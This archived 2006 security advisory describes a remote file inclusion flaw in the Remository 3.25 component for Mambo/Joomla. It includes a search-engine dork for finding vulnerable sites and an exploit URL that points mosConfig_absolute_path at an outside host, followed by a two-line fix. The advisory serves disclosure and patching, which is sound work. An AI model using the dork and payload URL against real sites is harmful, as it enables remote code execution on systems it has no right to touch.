Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-4158.htm

Mambo/Joomla Component Remository v3.25 (mosConfig_absolute_path) Remote File Inclusion Vulnerability



Mambo/Joomla Component Remository v3.25 (mosConfig_absolute_path) Remote File Inclusion Vulnerability
Mambo/Joomla Component Remository v3.25 (mosConfig_absolute_path) Remote File Inclusion Vulnerability



 =0D
    .:[ insecurity research team ]:.=0D
     .__..____.:.______.____.:.____ .=0D
 .:. |  |/    \:/  ___// __ \:/   _\.:.=0D
   : |  |   |  \\____\\  ___/\   /__ :. .=0D
 ..: |__|___|  /____  >\___  >\___  >.:=0D
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:=0D
 .   ...:.    .advisory.    .:...=0D
         :..................: o9.o8.2oo6 ..=0D
 =0D
 =0D
  Affected Application: Remository v3.25 =0D
=0D
       (Mambo/Joomla CMS Component)=0D
 =0D
 =0D
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  Discoverd by: camino=0D
 =0D
  Team: Insecurity Research Team=0D
 =0D
URL: http://www.insecurityresearch.org=0D 
 =0D
E-Mail: camino@sexmagnet.com=0D 
 =0D
 =0D
 =0D
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  Typ: Remote [x]  Local [ ]=0D
 =0D
       Remote File Inclusion [x]  SQL Injection [ ]=0D
 =0D
  Level: Low [ ]  Middle [x]  High [ ]=0D
 =0D
  Application: Remository=0D
 =0D
  Version: 3.25=0D
 =0D
  Vulnerable File: admin.remository.php=0D
 =0D
URL: http://www.remository.com=0D 
 =0D
  Description: It's a component that works with Mambo CMS 4.5+ to =0D
=0D
               provide a selection of files that users can download. =0D
 =0D
  Dork: intext:"Remository 3.25. is technology by Black Sheep Research"=0D
=0D
        inurl:"com_remository"=0D
 =0D
 =0D
 =0D
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
http://[sitepath]/[joomlapath]/administrator/components/=0D 
=0D
com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?=0D 
 =0D
 =0D
 =0D
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  o1.) open admin.remository.php=0D
 =0D
  o2.) take a look at line 16:=0D
=0D
       require_once ($mosConfig_absolute_path.'/components/=0D
=0D
       com_remository/com_remository_constants.php');=0D
 =0D
  o3.) take a look at line 19:=0D
=0D
       defined( '_VALID_MOS' ) or die( 'Direct Access to this location =0D
 =0D
       is not allowed.' );=0D
 =0D
  o4.) exchange line 19 with line 16!=0D
 =0D
 =0D
 =0D
 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  brOmstar and all the sexy members of insecurity research team ;-)


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH